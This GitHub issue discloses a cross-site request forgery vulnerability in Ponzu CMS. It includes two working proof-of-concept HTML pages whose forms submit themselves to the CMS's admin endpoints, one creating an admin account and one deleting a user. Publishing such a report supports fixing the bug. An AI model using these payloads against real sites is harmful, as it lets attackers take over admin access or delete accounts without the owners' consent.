Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross-Site Request Forgery in Ponzu CMS. #338

Open
Loginsoft-Research opened this issue Mar 3, 2020 · 0 comments
Open

Cross-Site Request Forgery in Ponzu CMS. #338

Loginsoft-Research opened this issue Mar 3, 2020 · 0 comments

Comments

@Loginsoft-Research
Copy link

Vulnerability Description :- The Ponzu CMS is vulnerable to CSRF. Application allows an attacker to create an admin user and delete an user in ponzu CMS. An attacker can exploit this vulnerability by crafting a malicious page and perform further actions after successful exploitation.

Step To Reproduce :-

To create an admin account
<html> <body> <form action="http://target.com/admin/configure/users" method="POST" enctype="multipart/form-data"> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="password" value="newadminpassword" /> </form> <script>document.forms[0].submit();</script> </body> </html

To delete an admin account
<html> <body> <form action="http://target.com/admin/configure/users/delete" method="POST" enctype="multipart/form-data"> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="id" value="1" /> </form> <script>document.forms[0].submit();</script> </body> </html>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant